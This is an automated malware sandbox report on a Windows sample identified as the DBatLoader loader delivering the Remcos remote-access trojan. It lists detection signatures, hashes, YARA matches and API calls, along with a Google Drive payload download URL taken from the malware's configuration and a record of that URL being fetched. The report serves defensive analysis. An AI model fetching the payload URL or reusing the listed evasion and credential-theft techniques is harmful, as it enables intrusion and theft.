Windows Analysis Report
nft438A5fN.exe

Overview

General Information

Sample name:	nft438A5fN.exe renamed because original name is a hash value
Original sample name:	02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617.exe
Analysis ID:	1562863
MD5:	1a4d920b70293f85958a9a2cde581f6f
SHA1:	756015ae8f1b03f14bc1126e6b2183a383631186
SHA256:	02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617
Tags:	doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

DBatLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Contains functionality to bypass UAC (CMSTPLUA)

Early bird code injection technique detected

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DBatLoader

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queues an APC in another process (thread injection)

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

AV process strings found (often used to terminate AV products)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Uncommon Child Processes Of SndVol.exe

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nft438A5fN.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Wuqtggvo.PIF

Avira: detection malicious, Label: TR/AD.Nekark.iteef

Found malware configuration

Source: nft438A5fN.exe

Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	ReversingLabs: Detection: 57%
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF	Virustotal: Detection: 68%			Perma Link

Multi AV Scanner detection for submitted file

Source: nft438A5fN.exe	ReversingLabs: Detection: 57%
Source: nft438A5fN.exe	Virustotal: Detection: 68%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Wuqtggvo.PIF

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: nft438A5fN.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		11_2_032338C8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02EB38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		21_2_02EB38C8

Source: nft438A5fN.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03207538 _wcslen,CoGetObject,		11_2_03207538
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E87538 _wcslen,CoGetObject,		21_2_02E87538

Uses 32bit PE files

Source: nft438A5fN.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 142.250.181.129:443 -> 192.168.2.8:49706 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: nft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1585864121.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000002.1599731448.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A53F000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1613117060.0000000002346000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1592952655.000000003A510000.00000004.00000020.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.00000000395DE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000002.1715376572.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000018.00000000.1733704656.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001B.00000002.1750139322.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000001C.00000000.1755754278.0000000000041000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source:	Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1589575934.0000000005850000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000010.00000002.1712179050.00000000000F1000.00000020.00000001.01000000.00000009.sdmp, xpha.pif.6.dr

Source: C:\Users\user\Desktop\nft438A5fN.exe	Code function: 0_2_02C95908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_02C95908
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	7_2_00050207
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	7_2_0005589A
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,	7_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 7_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	7_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 7_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	7_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0321C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0321C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0320C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_0320928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_032096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_032096A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03219B86 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_03219B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03207877 FindFirstFileW,FindNextFileW,	11_2_03207877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_03208847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_03208847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0324E8F9 FindFirstFileExA,	11_2_0324E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 11_2_0320BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0320BD72
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0005589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	15_2_0005589A
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00050207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	15_2_00050207
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00063E66 FindFirstFileW,FindNextFileW,FindClose,	15_2_00063E66
Source: C:\Users\Public\alpha.pif	Code function: 15_2_00054EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	15_2_00054EC1
Source: C:\Users\Public\alpha.pif	Code function: 15_2_0004532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	15_2_0004532E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	21_2_02E8928E
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	21_2_02E8C388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E9C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	21_2_02E9C322
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	21_2_02E896A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E99B86 FindFirstFileW,FindNextFileW,FindNextFileW,	21_2_02E99B86
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02ECE8F9 FindFirstFileExA,	21_2_02ECE8F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E87877 FindFirstFileW,FindNextFileW,	21_2_02E87877
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E88847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	21_2_02E88847
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 21_2_02E8BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	21_2_02E8BD72

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03207CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_03207CD2

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\nft438A5fN.exe

Code function: 0_2_02CAE4B8 InternetCheckConnectionA,

0_2_02CAE4B8

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 142.250.181.129:443

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 11_2_03216676 Sleep,URLDownloadToFileW,

11_2_03216676

Source: global traffic

DNS traffic detected: DNS query: drive.usercontent.google.com

Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: nft438A5fN.exe, 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
